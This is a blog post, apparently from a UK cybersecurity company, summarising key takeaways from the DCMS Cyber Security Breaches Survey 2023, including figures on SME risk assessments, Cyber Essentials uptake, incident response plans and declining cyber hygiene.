The key thing to remember is that you’re not powerless. By adopting the measures we’ve recommended here, you can minimise your cyber risks and ensure you don’t fall prey to digital predators.

Each year, the Department for Digital, Culture, Media & Sport (DCMS) releases its hotly anticipated Cyber Security Breaches Survey. It’s a key source of data on how businesses across the UK approach cybersecurity, the threats they face, and issues that need to be addressed in the coming year.

But for all its usefulness, the report is also very long – usually stretching to thousands of words in length. So, to save you from reading the whole thing, we’ve put together a handy list of the key takeaways from the report. Here’s the stuff you need to know. 

1. Assessing supply chain risk is rare for small businesses

We’ve talked about the danger supply chains pose to businesses a lot. Happily, it appears that larger businesses have begun to wake up to the risk. 63% of large businesses undertook a cybersecurity risk assessment in the last year, alongside 51% of medium-sized firms.

However, the practice remains rare among smaller businesses. When the sample size is broadened to include businesses of every size, just 3 in 10 have undergone a risk assessment.

Why is this happening? Well, it’s possible many businesses don’t have the resources to sanction regular risk assessments but, just as likely, is that many SMEs are simply unaware of the need. 

Worried about rising IT costs? Check out our guide to protecting your business on a budget.

2. A small number of businesses are taking cyber accreditations

The good news is that the proportion of UK organisations seeking extra guidance or information on cybersecurity is stable at 49% for businesses and 44% for charities. But, this does mean that a large proportion of organisations either aren’t aware of or aren’t using guidance like the NCSC’s 10 Steps to Cyber Security or the government-backed Cyber Essentials accreditation. 

According to the DCMS’s findings, just 14% of businesses and 15% of charities are aware of the Cyber Essentials scheme – rising to 50% of medium businesses and 59% of large businesses. And it’s a similar story with ISO 27001 certification with just 9% of businesses and 5% of charities adhering to the standard. Again, this is higher among large businesses (27%).

Although these figures might look alarming, there are a couple of caveats to bear in mind. First of all, the Cyber Essentials scheme was always going to take some time to bear fruit, it’s worth remembering the extremely limited cyber awareness across UK businesses before its launch. What’s more, the number of certified businesses is still growing steadily, up from 500 per month in January 2017 to just under 3500 in January 2023.

Added to this, the scheme was always likely to need to evolve to meet the needs of businesses. Given recent calls from UK companies for a new and improved Cyber Essentials certification, perhaps the time has come for the scheme to take the next step in its evolution.

3. Formal incident response plans aren’t widespread

The survey reveals that most organisations agree that they’d take several actions following a breach or cyber incident. However, the reality appears somewhat different. Only a minority of businesses (21%) have a formal incident response plan in place. This figure does rise amongst medium (47%) and large businesses (64%), indicating that it’s SMEs who are going without.

Perhaps this isn’t surprising, SMEs are often time and resource-poor and creating a thorough incident response plan isn’t a small undertaking. Nevertheless, it represents an area that both government bodies and companies like CyberSmart need to focus on in the coming year.

4. The number of identified breaches has declined 

At the risk of stating the obvious, cybercrime hasn’t decreased in the last year. But the number of breaches being reported by smaller businesses has declined. Just 32% of businesses and 24% of charities reported a breach or attack in the last 12 months – down from 39% of businesses and 30% of charities in the 2022 edition of the survey.

What’s going on? Are SMEs simply being attacked less? Unfortunately, no. 54% of SMEs in the UK experienced some form of cyber-attack in 2022. And, if we look at the figures for large businesses (69%) and high-income charities (56%) the numbers have remained stable from the 2022 report.

This seems to indicate that the drop is being driven by SMEs, which also suggests that they are undertaking less monitoring and logging of breaches than in previous years. Why? That brings us to our next key takeaway.

5. Cybersecurity is less of a priority for smaller businesses

It’s no secret that it’s a tricky time to be a small business. Economic uncertainty and a cost of living crisis have left many SMEs looking to reduce expenditure, particularly in areas like cybersecurity. This is borne out by the DCMS’s survey, with 68% of micro-businesses (10 employees or less) saying cyber security is a high priority, down from 80% last year.

In practice, this can mean less tracking and reporting of breaches, weaker defences, and greater reluctance to update tools, putting small businesses at a real disadvantage. But it doesn’t have to be this way. There are methods for budget-conscious businesses to reduce costs responsibly – we’ve outlined a few here.

6. Is cyber hygiene going backwards? 

Finally, cyber hygiene has long been a useful concept in helping businesses think about their security. The rationale behind it is simple. Most cyberattacks are pretty unsophisticated – think your common-or-garden phishing attack or a breach due to an unpatched vulnerability. 

This means businesses can avoid falling foul of most of them by using a set of basic “cyber hygiene” measures.

The most common of these hygiene measures are updated malware protection, cloud back-ups, passwords, restricted admin rights and network firewalls. However, all of these measures have seen a gradual decline over the last few editions of the DCMS report. For example: 

• use of password policies (79% in 2021, vs. 70% in 2023)
• use of network firewalls (78% in 2021 vs. 66% in 2023)
• restricting admin rights (75% in 2021, vs. 67% in 2023)
• policies to apply software security updates within 14 days (43% in 2021, vs. 31% in 2023).

DCMS analysis suggests that these trends appear to reflect shifts in the SME population, as figures across larger organisations have remained stable. As we mentioned earlier, it’s possible that, as many smaller businesses feel the pinch and place less importance on cybersecurity, cyber hygiene has begun to fall by the wayside. Whatever the reason, it’s a worrying development that could make some SMEs extremely vulnerable.

What have we learned from the DCMS Cyber Security Breaches Survey 2023?

Time to draw some broad-brush conclusions from the DCMS’s findings. First of all, the common theme running throughout the report is that the cost of living crisis is having a real impact on SMEs’ ability to protect themselves. Whether it’s the decline in breach reporting, so many businesses lacking incident response plans, or the fall in cyber hygiene standards, it’s clear SMEs need real assistance to bolster their defences.

Second, Cyber Essentials could be due for a revamp. The number of organisations who are aware of the accreditation, let alone completing it, remains too low.

Finally, although this piece may have made for a fairly grim read, there is an upside. These findings provide everyone within the UK cybersecurity industry a clear picture of where the problems lie and what we all need to do over the next 12 months to tackle them.

Want to know more about how to reduce cybersecurity costs responsibly? Check out our free guide to cybersecurity on a budget.